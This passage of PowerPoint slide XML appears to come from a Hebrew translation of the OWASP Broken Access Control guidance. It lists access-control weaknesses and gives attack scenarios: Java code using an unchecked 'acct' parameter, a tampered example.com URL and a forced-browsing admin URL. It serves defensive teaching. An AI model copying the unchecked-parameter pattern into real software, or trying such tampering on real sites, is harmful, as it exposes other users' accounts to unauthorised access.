              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> הניגשת למידע על חשבון:</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>pstmt.setString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(1, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>("acct"));</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ResultSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> results = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>pstmt.executeQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>( );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>התוקף פשוט משנה את משתנה </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>‘acct’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> בדפדפן על-מנת לשלוח כל מספר חשבון שהוא רוצה. במידה ולא מתבצעת בדיקה מתאימה, התוקף מסוגל לגשת לכל חשבון משתמש.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>http://example.com/app/accountInfo?acct=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>notmyacct</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>תרחיש 2:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> התוקף פשוט כופה על הדפדפן לגשת ל-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>URLs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>נדרשות הרשאות מנהל מערכת על מנת להיכנס לעמודי הניהול.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  http://example.com/app/getappInfo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  http://example.com/app/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>admin_getappInfo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>במידה ומשתמש בלתי מאומת מסוגל לגשת לאחד מהעמודים הנ"ל, זו פרצה. במידה ומשתמש ללא הרשאות ניגש לעמוד ניהול, זו פרצה.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Rectangle 107"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3474005" y="3132000"/>
            <a:ext cx="3383280" cy="316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gn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>האם היישום פגיע?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>בקרת גישה אוכפת מדיניות באופן שבו משתמשים אינם יכולים לקבל הרשאות מחוץ למה שמיועד עבורם. כישלונות לאכוף בקרת גישה מובילים לרוב לחשיפת מידע רגיש, שינוי או מחיקת מידע, או ביצוע פעולות עסקיות מעבר להרשאות המשתמש. חולשות בקרת גישה כוללות:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>עקיפת בקרות גישה באמצעות שינוי ה-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, שינוי המצב הפנימי של היישום, או עמוד </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, או פשוט ע"י שימוש בכלי ממשק פיתוח (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) מותאם</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a: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האפשרות של שינוי המפתח הראשי לרשומה של משתמש אחר, האפשרות לצפות או לערוך חשבון של משתמש אחר.</a:t>
            </a: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העלאת הרשאות. פעולה בשם משתמש ללא הצורך לבצע הזדהות או פעולה בשם חשבון מנהל מערכת כאשר בוצעה הזדהות בשם משתמש רגיל.</a:t>
            </a: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שיבוש ה-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>metadata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, כגון ביצוע מתקפת </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>replay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> או חבלה ב-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>JSON Web Token (JWT) access control token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> או ה-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> או שיבוש שדות חבויים על-מנת להעלות הרשאות, או ניצול לרעה של תוקף ה-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>JWT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a: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תצורה שגויה של </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CORS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> מאפשרת גישה בלתי מורשית לממשק </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a: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כפייה על הדפדפן להיכנס לעמודים הדורשים אימות, ללא אימות נדרש או לעמודים הדורשים הרשאה, כאשר משתמשים בחשבון רגיל. ממשק פיתוח (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) ללא בקרות גישה עבור </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>PUT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> או </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
